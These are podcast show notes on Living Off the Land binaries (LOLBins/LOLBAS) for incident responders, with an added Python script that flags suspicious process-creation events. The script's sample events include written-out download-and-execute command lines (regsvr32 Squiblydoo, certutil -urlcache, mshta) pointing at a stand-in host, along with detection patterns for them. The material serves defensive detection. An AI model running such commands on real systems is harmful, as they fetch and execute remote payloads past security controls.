Formerly the Brakeing Down Incident Response Podcast
Recorded Oct 2019
TOPIC: Laughing at Binaries - LOLBin/LOLBAS
OUR GUEST WILL BE: Oddvar Moe, Sr. Security Consultant, TrustedSec - Red Teamer - @Oddvarmoe
Blog - https://oddvar.moe/
lolbas-project.com
https://github.com/api0cradle/UltimateAppLockerByPassList
https://github.com/api0cradle/PowerAL
OUR SPONSORS:
NEWS-WORTHY:
- Cyber Security Awareness Month
- Flaw in sudo that lets a user obtain admin (root) privileges even when the sudoers policy denies them
- Microsoft enables Tamper Protection by default for all Windows 10 users to defend against attacks
- Most Americans do not know what MFA is????
- Hackers bypassing some types of 2FA security, FBI warns
SITE-WORTHY:
- Guest - LOLBin/LOLBAS - api0cradle - aka Oddvar Moe
TOOL-WORTHY:
- Guest:
MALWARE OF THE MONTH:
- New Dridex version
  - Delivered via an Office document, or an email with a URL
  - wscript/cscript downloads a malicious binary named Chrome.exe
  - Creates a scheduled task for persistence
  - Chrome.exe calls msra.exe for comms: C:\Windows\syswow64\Msra.exe chrome.exe
  - So, another LOLBin? This is what prompted this podcast.
TOPIC OF THE DAY:
Laughing at Binaries - LOLBin/LOLBAS
What is a LOLBin and LOLBAS? It stands for Living Off the Land Binaries and Scripts; libraries (DLLs) count too.
What started all this? Casey Smith's (@SubTee) work on application whitelisting bypasses from around 2015, where he found ways to use binaries already on the system to do bad things: RegSvr32, RegAsm, RunDll32 and several others.
Why are these an issue for us defenders? Pentesters and red teams use them to get around security solutions like AV, EDR and application whitelisting, and real malware (see the Dridex case above) does the same.
Do these normally execute? If so, how noisy are they? Many of these are signed Microsoft binaries that Windows and installers run legitimately, so some are noisy.
What do we need to watch out for? Command line parameters are key: which parameters are these utilities being executed with?
Are there any lists people can use? The Malware Archaeology Logging page has a list and a link to Oddvar's page.
What about security solutions, do we need to be concerned with these? Yes, many AV and EDR products will not alert on these items. You will need to build your own alerts and filter out the known-good noise.
What about logging them? Use the list(s) to build a lookup list that you can apply to 4688 (process creation) events or Sysmon Event ID 1 (process create) and Event ID 7 (image loaded) events, and monitor the matches. Note that 4688 only carries the command line if command-line auditing is enabled.
What about MITRE ATT&CK, do they reference these? Yes, several of these binaries are mentioned in MITRE ATT&CK, so map your tools to ATT&CK techniques.
Are there ways to test for these LOLs? What else do people need to watch out for?
Other Articles:
-------------------
Casey Smith @SubTee - Red Canary
Bypassing Application Whitelisting - SHMOOCon 2015
SANS
DerbyCon 2016
DerbyCon 2019
Oddvar Moe talk on LOLBin at DerbyCon 2018
Alternate Data Streams:
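As an added example of the lookup-list approach from the last few questions (which binary, which command line parameters, and which matches to filter out as noise), here is a small Python triage over process-creation events. This is not code from the podcast, from Oddvar Moe, or from the LOLBAS project: the events are constructed records shaped like Sysmon Event ID 1 and Security 4688, the rule table is a hand-picked subset of well-known LOLBAS entries rather than the full list, and the "parent outside trusted directories" heuristic and the "any msra.exe execution" rule are assumptions made for the example (the latter following the Dridex note above).

```python
"""Match process-creation events against a LOLBAS lookup list.

Added example for these show notes; not code from the podcast, from Oddvar
Moe, or from the LOLBAS project. The events below are constructed, not real
telemetry, and the rule table is a small hand-picked subset of well-known
LOLBAS entries (the full list lives on the LOLBAS project site).
"""
import re
from pathlib import PureWindowsPath

# Sysmon Event ID 1 field name -> equivalent field in Security 4688, so one
# rule set runs over either source. (4688 only carries CommandLine when
# command-line auditing is enabled.)
FIELD_ALIASES = {
    "Image": "NewProcessName",
    "CommandLine": "CommandLine",
    "ParentImage": "ParentProcessName",
}

# Lookup list: lowercase image name -> regexes over the command line that
# separate abuse from routine use. An empty list means any execution is
# worth a look (assumption: the binary is rare in a normal estate; msra.exe
# is here because of the Dridex case in the notes above).
LOLBAS_RULES = {
    "regsvr32.exe": [r"(?i)/i:\s*https?://", r"(?i)scrobj\.dll"],  # Squiblydoo
    "rundll32.exe": [r"(?i)(javascript|vbscript):"],
    "mshta.exe":    [r"(?i)https?://", r"(?i)(javascript|vbscript):"],
    "certutil.exe": [r"(?i)-urlcache", r"(?i)-(de|en)code"],
    "wscript.exe":  [r"(?i)\\(Temp|Downloads|AppData)\\"],  # scripts from user-writable dirs
    "cscript.exe":  [r"(?i)\\(Temp|Downloads|AppData)\\"],
    "msra.exe":     [],
}

# Parents living here are treated as routine; anything else (user profile,
# ProgramData, temp) gets a reason line. Heuristic for this example only.
TRUSTED_PARENT_DIRS = (r"C:\Windows", r"C:\Program Files", r"C:\Program Files (x86)")


def normalize(event):
    """Return a Sysmon-shaped dict whether the input was Sysmon EID 1 or 4688."""
    return {k: event.get(k, event.get(alias, "")) for k, alias in FIELD_ALIASES.items()}


def image_name(path):
    return PureWindowsPath(path).name.lower()


def under_trusted_dir(path):
    p = path.lower()
    return any(p.startswith(d.lower() + "\\") for d in TRUSTED_PARENT_DIRS)


def evaluate(event):
    """Reasons an already-normalized event is suspicious; [] means ignore it."""
    name = image_name(event["Image"])
    if name not in LOLBAS_RULES:
        return []
    reasons = []
    patterns = LOLBAS_RULES[name]
    if not patterns:
        reasons.append(f"{name}: execution of rarely used LOLBin")
    for pat in patterns:
        if re.search(pat, event["CommandLine"]):
            reasons.append(f"{name}: command line matches {pat!r}")
    if not under_trusted_dir(event["ParentImage"]):
        reasons.append(f"{name}: parent {event['ParentImage']} is outside trusted directories")
    return reasons


def triage(events):
    """Run the lookup over raw events; return (image name, reasons) for each hit."""
    hits = []
    for raw in events:
        ev = normalize(raw)
        reasons = evaluate(ev)
        if reasons:
            hits.append((image_name(ev["Image"]), reasons))
    return hits


# Constructed sample events (not captured telemetry). Indexes 0-5 mimic
# Sysmon EID 1; index 6 mimics a Security 4688 record.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",  # routine installer use
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\SysWOW64\msra.exe",  # Dridex-style chain
     "CommandLine": r"C:\Windows\syswow64\Msra.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\chrome.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",  # not in the list
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://example.invalid/a.exe a.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\wscript.exe",  # domain logon script, routine
     "CommandLine": r'wscript.exe "\\fileserver\netlogon\logon.vbs"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"NewProcessName": r"C:\Windows\System32\mshta.exe",  # 4688-shaped record
     "CommandLine": "mshta.exe http://example.invalid/p.hta",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS):
        print(name)
        for r in reasons:
            print("   ", r)
```

Running it flags four of the seven events (the Squiblydoo regsvr32, the msra.exe spawned from a user profile, the certutil download and the mshta launched from Word) and stays quiet on the installer's regsvr32, the netlogon script and notepad, which is the filtering step the notes ask for. In production the lookup table should be generated from the full LOLBAS list rather than hand-typed, and the trusted-parent heuristic tuned to the estate.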